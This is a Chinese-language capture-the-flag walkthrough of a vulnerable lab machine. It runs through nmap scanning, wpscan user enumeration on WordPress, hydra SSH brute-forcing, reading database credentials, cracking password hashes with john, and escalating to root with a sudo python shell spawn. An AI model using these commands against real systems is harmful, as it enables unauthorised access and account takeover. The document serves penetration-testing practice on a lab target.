一、信息收集
nmap -sP 192.168.145.*
扫一下端口,开放了22、80、111、50967。
nmap -sT -T4 -p1-65535 192.168.145.129
dirsearch -u http://192.168.145.129/
二、flag1
直接访问一下网站。
flag是藏在源码那里的,找了好久,在service页面下的源码里面。
flag1{b9bbcb33e11b80be759c4e844862482d}
三、flag2
这个后台登录页面被重定向了,我们需要配置一下,如下添加即可。
vim /etc/hosts
http://192.168.145.129/wordpress/wp-login.php
有一个专门扫描wordpress的工具叫wpscan,我们直接用它扫一下。
wpscan --url http://192.168.145.129/wordpress -e vp,u
-e 扫描多个选项
vp 只枚举有漏洞的插件
u 枚举用户名
发现有两个用户名,上面扫描到有开放22端口,那我们直接爆破ssh试试。michael可以爆破出来密码,steven不行。
hydra -l michael -P passwd.txt ssh://192.168.145.129 -f -e nsr -vV
直接ssh登录上去。
三、flag3
打开看看咯,里面有数据库的账号和密码。
连接数据库。
mysql -u root -p
查看数据库。
show databases;
查看表。
show tables;
wp_users估计有东西,直接看看,发现是两个用户的密码。
select * from wp_users;
但是我还发现了wp_posts这张表里面居然有flag3和flag4,哈哈哈。居然可以这样子,不过我还是说一下正常的流程吧。
上面拿到steven用户的哈希值,可以拿去md5网站解密,这里我就用john这个工具爆破一下。把哈希值写入一个passwd.txt文件中,再去爆破即可。
john passwd.txt --wordlist=/usr/share/wordlists/rockyou.txt
这里我之前已经爆破过了,所以我们直接查看即可。
john --show pass.txt
然后登录后台即可拿到flag3,这里我就不再去登录了。
四、flag4
切换到steven用户,输入命令然后输入密码即可。
su steven
查看是否有sudo权限的命令。
sudo -l
发现有个python命令是具有sudo权限的,sudo提权可以看我这篇文章。
sudo python -c 'import pty;pty.spawn("/bin/bash")'
五、总结
这个靶机不算难,挺简单的,这些工具的使用也都是常见的。
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习